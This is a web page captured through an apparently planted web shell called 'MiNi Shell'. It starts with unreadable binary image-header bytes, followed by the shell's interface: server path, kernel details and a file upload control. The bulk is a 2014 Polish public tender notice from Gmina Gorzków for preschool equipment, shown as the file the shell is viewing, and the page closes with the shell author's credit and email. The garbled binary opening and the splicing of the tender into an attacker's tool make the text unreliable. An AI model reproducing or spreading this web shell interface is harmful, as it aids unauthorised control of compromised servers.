JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140618/206172-N-2014.html

<p class="kh_header"><b>Gorzków: Zakup wyposażenia w ramach modernizacji oddziałów przedszkolnych Szkoły Podstawowej w Gorzkowie</b><br>
<b>Numer ogłoszenia: 206172 - 2014; data zamieszczenia: 18.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gorzków , ul. Główna 9, 22-315 Gorzków, woj. lubelskie, tel. 084 6838156, faks 084 6838111.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://uggorzkow.bip.e-zeto.eu/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup wyposażenia w ramach modernizacji oddziałów przedszkolnych Szkoły Podstawowej w Gorzkowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje dostawę urządzeń do placu zabaw, ceramiki, wyposażenia łazienek, mebli, pomocy edukacyjnych, sprzętu multimedialnego i elektronicznego na potrzeby realizacji projektu systemowego: Modernizacja oddziałów przedszkolnych w szkołach podstawowych w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.  
1.Wykonawca dostarczy przedmiot umowy własnym transportem, na własny koszt i na własne ryzyko do miejsca wskazanego przez Zamawiającego - Szkoła Podstawowa w Gorzkowie, ul. Główna 9, 22-315 Gorzków-Osada. 
2.Wykonawca zobowiązuje się dostarczyć Zamawiającemu wyłącznie wyroby fabrycznie nowe, wolne od wad, oryginalnie zapakowane i odpowiadające normom jakościowym, określonym we właściwych aktach prawnych.
3.W przypadku sprzętu elektronicznego, sprzętu multimedialnego podane parametry są parametrami minimalnymi. 
4.Pomocy dydaktyczne  będą przeznaczone do pracy z dziećmi w wieku 3-6 lat, co Wykonawca jest zobowiązany uwzględnić w ofercie przy doborze poziomu pomocy dydaktycznych. 
5.Każdy z dostarczonych artykułów winien posiadać deklarację zgodności CE oraz odpowiadać normom europejskim i krajowym i być zgodny z Dyrektywą 2001/95/WE Parlamentu Europejskiego z dnia 3 grudnia 2001 r. w sprawie ogólnego bezpieczeństwa produktów.
6.Zamawiający dopuszcza możliwość składania ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części zamówienia. Szczegółowy opis przedmiotu zamówienia dla poszczególnych części zawiera kol. 2 w zestawieniu rzeczowo-finansowym, które stanowi załącznik nr 6 do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9, 26.26.10.00-5, 44.41.13.60-7, 44.41.17.00-1, 39.16.21.00-6, 39.16.10.00-8, 37.52.00.00-9, 30.21.31.00-6, 32.32.20.00-6, 32.00.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia z art. 22 ust.1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Należy przedłożyć wypełnione i podpisane zestawienie rzeczowo-finansowe (Załącznik nr 6 do SIWZ) jako załącznik do Formularza Oferty w zakresie części jakiej dotyczy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uggorzkow.bip.e-zeto.eu/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Gorzków, ul. Główna 9, 22-315 Gorzków-Osada.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.06.2014 godzina 11:00, miejsce: Urząd Gminy Gorzków, ul. Główna 9, 22-315 Gorzków-Osada.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy: ,Modernizacja oddziałów przedszkolnych w szkołach podstawowych, jest  współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki 2007 - 2013, Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach Działanie: 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty. Poddziałanie: 9.1.1 Zmniejszanie nierówności w stopniu upowszechniania edukacji przedszkolnej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja placu zabaw poprzez doposażenie placu zabaw i montaż urządzeń na placu zabaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę wraz z montażem na istniejącym placu zabaw następujących urządzeń: Zabawka wielofunkcyjna- ścianka - szt. 3; Sprężynowce jednoosobowe - zabawka na sprężynie - szt. 6; Karuzela tarczowa z siedzeniami dla 4 osób - szt. 1; Domki dla dzieci - szt. 3; Trampolina- dla 1-3 osób - szt. 1; Ławka z bali stała z oparciem - szt. 6; Nawierzchnia bezpieczna, syntetyczna- 30 m2. Urządzenia powinny posiadać deklaracje zgodności, certyfikaty, atesty oraz gwarancje min. 24 mies. o ile wymagania Zamawiającego określone w szczegółowym opisie nie stanowią inaczej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 45.11.27.23-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostosowanie pomieszczeń łazienek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę materiałów wraz z montażem, instalacją. Zamawiający nie wymaga ułożenia płytek. Umywalki wym. min. 55x45 cm, - szt. 5; Miski ustępowe (kompakt) 43c34 cm - szt. 7; Nakładki zmniejszające obwód ustępu 30 x 40 x 15 cm - szt. 4; Podesty do toalet i umywalek 42x30x14 cm.- szt. 2; Suszarki do rąk min. 1800 W, 16m/s - szt. 4; Lustro 53x60cm - szt. 5; Podajnik na mydło poj. 480 ml- szt. 5; Terakota- gres szkliwiony, 33x33 cm, - 3, 70 m2 ; Płytki ceramiczne - gres szkliwiony 25x33 cm - 24, 75 m2; terakota-gres szkliwiony 33x33cm-23, 20 m2; płytki ceramiczne -gres szkliwiony 25x36 cm - 103, 48 m2. Urządzenia powinny posiadać deklaracje zgodności, certyfikaty, atesty oraz gwarancje min. 24 mies. o ile wymagania zamawiającego określone w szczegółowym opisie nie stanowią inaczej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.13.60-7, 44.41.17.00-1, 39.83.17.00-3, 26.26.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie pomieszczeń w meble i pomoce dydaktyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę następującego wyposażenia: Odkurzacz - szt. 1; Froterka - szt. 1; Zestaw do sprzątania - szt. 1; Stoły przedszkolne (z regulowanymi nogami) 115x65 - szt. 15; Krzesełka dziecięce nr 3 - szt. 25; Krzesełka dziecięce nr 4 - szt. 25; Szafka ze schowkami - szt. 7; Szafa zamykana- szt. 3; Regał otwarty na zabawki - szt. 3; Biblioteczka - szt. 3; Biurko dla nauczyciela - szt. 3; Krzesło dla nauczyciela - szt. 3; Wykładzina dywanowa 5m x 5m - m2 75; Dekoracja na ścianę- element stały - szt. 1; Tablica przedszkolna - szt. 3; Krzesełka dziecięce nr 2 - szt. 15; Ścianki dekoracyjno- fakturowe- element stały - szt. 1; Aplikacje na ścianę, przesuwanki - szt. 1; Krzesełka dziecięce nr 1 - szt	5; Szafka - szt. - 1; Makatka edukacyjna z ruchomymi elementami na ścianę - szt. 1; Przesuwanki, labirynty na ścianę - kpl. 1; Rolety okienne z montażem - szt. 11; Pufy - szt. 19; Poduchy sensoryczne - szt. 5; Bajkowe materace- 3 częściowe - szt. 12; Kolorowe materace narożne np. serce, tulipan -  szt. 1; Wałek 120 x 20 - 2 sztuki w kpl. - szt. 1; Piankowy samolot- szt.1; Poduchy silikonowe- szt. 5; Gruszki rehabilitacyjne - szt. 7; Piankowa ciuchcia - szt. 1; Kolorowe foteliki z pianki - szt.4; Stolik z pianki 78 x 68 x 24 cm - szt. 1; Bujaki kolorowe- 70x30x52cm - szt. 5; Kanapka 60 x 105 x 60 cm - szt. 2; Poducha podpierająca - szt. 7; Zestaw szatniowy zamykany 5 segmentowy- szt. 12; Ławka do szatni- szt. 7; Makatka na ogłoszenia 89 x 65 cm - szt. 2; Makatka na ogłoszenia 49 x 56,5 cm - szt. 1; Dekoracje na ścianę, zestaw - szt. 3; Dekoracje na ścianę, zestaw - szt. 2; Geometryczne kształty z tworzywa - szt. 9; Zestaw perkusyjny - szt. 3; Łazik ( jeździk dla dzieci) - szt. 6; Lalka mówiąca - 50 cm - szt. 12; Wózek gondola 58 x 38 x 61cm - szt. 6; Straganik warzywny z pojemnikami 76 x 72 x 110cm - szt. 3; Zestaw małego lekarza - szt. 9; Samochód wywrotka 23 x 13 x 12 cm, - szt. 12; Betoniarka- samochód 38 x 26 x16cm - szt.15; Koparka - samochód 38 x 26 x16cm - szt. 15; Straż pożarna- samochód - min. 47 x 27 x 16 cm- szt. 15; Koń na biegunach- plastikowy min. 86 x 29 x 43 cm - szt. 3; Lalka zamykająca oczy 74 cm - szt.12; Zestaw narzędzi do majsterkowania min.34 x 24,5cm. - kpl. 6; Zestaw plansz do zabaw ruchowych mi. 170 x 125 cm - szt. 6; Taca z naczyniami - szt. 15; Kuchenka- szt. 3; Kasa z kalkulatorem	 - szt. 3; Klocki drewniane- min.100 elementów - szt. 15; Znaki drogowe w woreczku- min.16 drewnianych elementów - szt. 3; Plansza mała do zabawy samochodami ze schem. ulic i skrzyżowań - szt. 3; Miś- maskotka do zabawy, siedzenia min.70 cm. - szt	9; Piłki skaczące średnica min. 45 cm - szt. 12; Piłki do rytmiki- średnica min. 17 cm. - szt. 75; Kolorowe woreczki do rytmiki - szt. 75; Pojemnik na zabawki- 35 x 35 x 42,5 cm - szt. 6; Piłka- o średnicy min. 30 cm. - szt. 12; Domek do zabawy min.116 x 107 x 120 cm - szt. 3; Globus podświetlany min. 40 cm - szt.  3; Zestaw pierwsze kroki z magnesem- szt.  3; Torba ogrodnika z akcesoriami min. 15,2-21,5 cm. - szt. 3; Mapa Polski- województwa min. 29 x29 x1 cm.  - szt. 3; Zegar plan dnia wym. 71 x 71 cm, 26 magnetycznych obrazków -szt. 3; Ścienna mapa Polski min. 84 x 87 cm- szt.3; Plansze przyrodnicze min. 4,2 x 4,2 cm, dla 2-4 graczy - szt. 3; Kalendarz magnetyczny na pory roku min. 52 x 60 cm - szt. 3; Piaskownica- drewniane pudełko min. 65 x 60 x 4 cm - szt. 15; Gra edukacyjna Unia Europejska- min. 67 x 48 cm  - kpl. 3; Gra do ćwiczenia pamięci dziecka np. flagi - dla 2-6 graczy - szt. 12; Gra planszowa np. Jaś i Małgosia min. 42 x 31 cm. - szt. 6; Ekologiczne Puzzle min. 21 x 3,5 cm- szt. 12; Gra ćwicząca pamięć dziecka min.33,5 x 26,2 cm - szt. 12; Gra do nauki recyklingu min. 34 x 18 x 17 cm. - szt. 3; Dwustronne puzzle do języka angielskiego min.15 x 7 x 2 cm - szt. 15; Fiszki z języka angielskiego 96 sztuk, wym.min.14 x 7 cm - szt. 9; Komplet 7 plansz tematycznych z języka angielskiego 42,5 x 55 cm - szt. 3; Słówka po angielsku- karty- szt.3; Gra w skojarzenia- karty - szt. 3; Magnetyczne formy z czarną planszą min. 35 el. i 20 kart- szt.18; Słuchowisko z bajkami- płyta CD - szt.3; Liczby na magnesach min. 10 płytek o wym. min. 10 x 15 cm. - szt. 15; Nożyczki przedszkolne min. 13 cm - szt. 45; Klej uniwersalny min. 100 ml  - szt. 45; Klej przezroczysty- poj. min.500g - szt. 45; Plastelina- zestaw zawiera min.12 kolorów - szt. 75; Farby tempera- poj. min. 1000 ml -szt. 45; Kredki- 12 kolorów, dł. min.12 cm, śr. rysika min.0,5 cm, temp. - szt. 45; Bibuła różne kolory min. 200 x 50 cm - szt. 96; Kolorowy papier rysunkowy A4- min.400 arkuszy, 8 kolorów - kpl 30; Brystol różne kolory A3-  min.20 arkuszy, 10 kolorów - kpl. 30; Brystol biały A4- min.100 arkuszy, 200g/m2 - kpl. 30; Taśma samoprzylepna- wym. min. 1cm x 400 cm - szt. 60; Papier szary A3- min.10 arkuszy, wym. 105 x 126 cm - szt.30; Tektura falista- metalizowana, min. 10 arkuszy, format A4 - szt. 48; Pędzle do malowania- min.24 pędzli o wym. min. 16 cm x 4 mm, - szt. - 12; Klasyczne  markery zmywalne min.12 kol., śr. końc. min. 0,4 cm - kpl. - 45; Gaśnica proszkowa 4kg GP-4x ABC  - 3 szt.; Oznaczenia ewakuacyjne (komplet 8 oznaczeń) -  szt. 3; Apteczka metalowa z wyposażeniem wym. min. 25 x 25 x 12 - szt. 3; Zabezpieczenie gniazd elektrycznych (komplet- 8 szt.) - 3 szt.; Instrukcja udzielania pierwszej pomocy- min.25 x 35 cm - szt. 3; Zabezpieczenie narożników (komplet 4 szt.) wym. 4 x 4 cm wys. 2 cm- kpl. 18; Zabezpieczenie grzejników z montażem - szt. 9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 39.16.10.00-8, 35.11.13.00-8, 37.52.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakup sprzętu ITC z montażem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje dostawę następujących urządzeń wraz z instalacją: Komputer przenośny wraz z oprogramowaniem- przekątna 17 cali - szt. 3; Drukarka kolorowa laser 2400x600 dpi- szt. 1; Drukarka mono laser 4800x600 dpi - szt. 2;Skaner 4800x2400 dpi - szt. 1; Rzutnik multimedialny: matryca 3LCD, jasność: 2700 ANSI lumen - szt. 3; Ekran- przenośny na statywie z trójnogiem, 150 x 150 cm. - szt. 3; Telewizor LED 40, Ful HD, tuner DVB-T, technologia 3 D - szt. 3; Odtwarzacz DVD szt. 3; Radio z odtwarzaczem CD i wejściem USB - szt.  3; Tablica interaktywna wraz z oprogramowaniem, przekątna 77 cali - szt. 3; Kserokopiarka -  szt. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 32.32.20.00-6, 32.00.00.00-3, 32.30.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com